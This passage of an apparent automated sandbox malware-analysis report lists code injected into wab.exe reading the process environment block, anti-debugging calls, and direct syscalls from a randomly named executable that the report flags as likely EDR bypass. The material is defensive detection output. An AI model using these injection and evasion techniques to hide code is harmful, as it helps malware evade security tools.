            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h]25_2_21F7B440
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h]25_2_21F7B440
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h]25_2_21F7B440
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h]25_2_21FAE443
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA430 mov eax, dword ptr fs:[00000030h]25_2_21FAA430
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C427 mov eax, dword ptr fs:[00000030h]25_2_21F6C427
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E420 mov eax, dword ptr fs:[00000030h]25_2_21F6E420
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E420 mov eax, dword ptr fs:[00000030h]25_2_21F6E420
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E420 mov eax, dword ptr fs:[00000030h]25_2_21F6E420
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9340D mov eax, dword ptr fs:[00000030h]25_2_21F9340D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA8402 mov eax, dword ptr fs:[00000030h]25_2_21FA8402
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA8402 mov eax, dword ptr fs:[00000030h]25_2_21FA8402
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA8402 mov eax, dword ptr fs:[00000030h]25_2_21FA8402
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F747FB mov eax, dword ptr fs:[00000030h]25_2_21F747FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F747FB mov eax, dword ptr fs:[00000030h]25_2_21F747FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F927ED mov eax, dword ptr fs:[00000030h]25_2_21F927ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F927ED mov eax, dword ptr fs:[00000030h]25_2_21F927ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F927ED mov eax, dword ptr fs:[00000030h]25_2_21F927ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D7E0 mov ecx, dword ptr fs:[00000030h]25_2_21F7D7E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F717EC mov eax, dword ptr fs:[00000030h]25_2_21F717EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F717EC mov eax, dword ptr fs:[00000030h]25_2_21F717EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F717EC mov eax, dword ptr fs:[00000030h]25_2_21F717EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F757C0 mov eax, dword ptr fs:[00000030h]25_2_21F757C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F757C0 mov eax, dword ptr fs:[00000030h]25_2_21F757C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F757C0 mov eax, dword ptr fs:[00000030h]25_2_21F757C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D7B0 mov eax, dword ptr fs:[00000030h]25_2_21F9D7B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h]25_2_21F6F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h]25_2_21FFF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h]25_2_21FFF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h]25_2_21FFF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h]25_2_21FFF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h]25_2_21FFF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F453 mov eax, dword ptr fs:[00000030h]25_2_2202F453
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF97A9 mov eax, dword ptr fs:[00000030h]25_2_21FF97A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F707AF mov eax, dword ptr fs:[00000030h]25_2_21F707AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204547F mov eax, dword ptr fs:[00000030h]25_2_2204547F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F78770 mov eax, dword ptr fs:[00000030h]25_2_21F78770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h]25_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h]25_2_21F6B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h]25_2_21F6B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h]25_2_21F6B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h]25_2_21F6B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F70750 mov eax, dword ptr fs:[00000030h]25_2_21F70750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF4755 mov eax, dword ptr fs:[00000030h]25_2_21FF4755
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2750 mov eax, dword ptr fs:[00000030h]25_2_21FB2750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2750 mov eax, dword ptr fs:[00000030h]25_2_21FB2750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA674D mov esi, dword ptr fs:[00000030h]25_2_21FA674D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA674D mov eax, dword ptr fs:[00000030h]25_2_21FA674D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA674D mov eax, dword ptr fs:[00000030h]25_2_21FA674D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F83740 mov eax, dword ptr fs:[00000030h]25_2_21F83740
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F83740 mov eax, dword ptr fs:[00000030h]25_2_21F83740
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F83740 mov eax, dword ptr fs:[00000030h]25_2_21F83740
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69730 mov eax, dword ptr fs:[00000030h]25_2_21F69730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69730 mov eax, dword ptr fs:[00000030h]25_2_21F69730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA273C mov eax, dword ptr fs:[00000030h]25_2_21FA273C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA273C mov ecx, dword ptr fs:[00000030h]25_2_21FA273C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA273C mov eax, dword ptr fs:[00000030h]25_2_21FA273C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA5734 mov eax, dword ptr fs:[00000030h]25_2_21FA5734
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F73720 mov eax, dword ptr fs:[00000030h]25_2_21F73720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8F720 mov eax, dword ptr fs:[00000030h]25_2_21F8F720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8F720 mov eax, dword ptr fs:[00000030h]25_2_21F8F720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8F720 mov eax, dword ptr fs:[00000030h]25_2_21F8F720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC720 mov eax, dword ptr fs:[00000030h]25_2_21FAC720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC720 mov eax, dword ptr fs:[00000030h]25_2_21FAC720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220454DB mov eax, dword ptr fs:[00000030h]25_2_220454DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAF71F mov eax, dword ptr fs:[00000030h]25_2_21FAF71F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAF71F mov eax, dword ptr fs:[00000030h]25_2_21FAF71F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F70710 mov eax, dword ptr fs:[00000030h]25_2_21F70710
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA0710 mov eax, dword ptr fs:[00000030h]25_2_21FA0710
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77703 mov eax, dword ptr fs:[00000030h]25_2_21F77703
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F75702 mov eax, dword ptr fs:[00000030h]25_2_21F75702
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F75702 mov eax, dword ptr fs:[00000030h]25_2_21F75702
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC700 mov eax, dword ptr fs:[00000030h]25_2_21FAC700
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22044500 mov eax, dword ptr fs:[00000030h]25_2_22044500
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF06F1 mov eax, dword ptr fs:[00000030h]25_2_21FF06F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF06F1 mov eax, dword ptr fs:[00000030h]25_2_21FF06F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA36EF mov eax, dword ptr fs:[00000030h]25_2_21FA36EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D6E0 mov eax, dword ptr fs:[00000030h]25_2_21F9D6E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D6E0 mov eax, dword ptr fs:[00000030h]25_2_21F9D6E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA16CF mov eax, dword ptr fs:[00000030h]25_2_21FA16CF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h]25_2_21F7B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h]25_2_21F7B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h]25_2_21F7B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h]25_2_21F7B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h]25_2_21F7B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h]25_2_21F7B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA6C7 mov ebx, dword ptr fs:[00000030h]25_2_21FAA6C7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA6C7 mov eax, dword ptr fs:[00000030h]25_2_21FAA6C7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F676B2 mov eax, dword ptr fs:[00000030h]25_2_21F676B2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F676B2 mov eax, dword ptr fs:[00000030h]25_2_21F676B2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F676B2 mov eax, dword ptr fs:[00000030h]25_2_21F676B2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA66B0 mov eax, dword ptr fs:[00000030h]25_2_21FA66B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6D6AA mov eax, dword ptr fs:[00000030h]25_2_21F6D6AA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6D6AA mov eax, dword ptr fs:[00000030h]25_2_21F6D6AA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC6A6 mov eax, dword ptr fs:[00000030h]25_2_21FAC6A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA2674 mov eax, dword ptr fs:[00000030h]25_2_21FA2674
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA9660 mov eax, dword ptr fs:[00000030h]25_2_21FA9660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA9660 mov eax, dword ptr fs:[00000030h]25_2_21FA9660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA660 mov eax, dword ptr fs:[00000030h]25_2_21FAA660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA660 mov eax, dword ptr fs:[00000030h]25_2_21FAA660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8C640 mov eax, dword ptr fs:[00000030h]25_2_21F8C640
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220035BA mov eax, dword ptr fs:[00000030h]25_2_220035BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220035BA mov eax, dword ptr fs:[00000030h]25_2_220035BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220035BA mov eax, dword ptr fs:[00000030h]25_2_220035BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220035BA mov eax, dword ptr fs:[00000030h]25_2_220035BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F5BE mov eax, dword ptr fs:[00000030h]25_2_2202F5BE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220455C9 mov eax, dword ptr fs:[00000030h]25_2_220455C9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220435D7 mov eax, dword ptr fs:[00000030h]25_2_220435D7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220435D7 mov eax, dword ptr fs:[00000030h]25_2_220435D7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220435D7 mov eax, dword ptr fs:[00000030h]25_2_220435D7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA6620 mov eax, dword ptr fs:[00000030h]25_2_21FA6620
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA8620 mov eax, dword ptr fs:[00000030h]25_2_21FA8620
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7262C mov eax, dword ptr fs:[00000030h]25_2_21F7262C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E627 mov eax, dword ptr fs:[00000030h]25_2_21F8E627
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F73616 mov eax, dword ptr fs:[00000030h]25_2_21F73616
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F73616 mov eax, dword ptr fs:[00000030h]25_2_21F73616
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2619 mov eax, dword ptr fs:[00000030h]25_2_21FB2619
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h]25_2_21F8260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAF603 mov eax, dword ptr fs:[00000030h]25_2_21FAF603
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E724E GetProcessHeap,8_2_222E724E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_222E2639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_222E2B1C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_222E60E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtWriteVirtualMemory: Direct from: 0x76EF490C
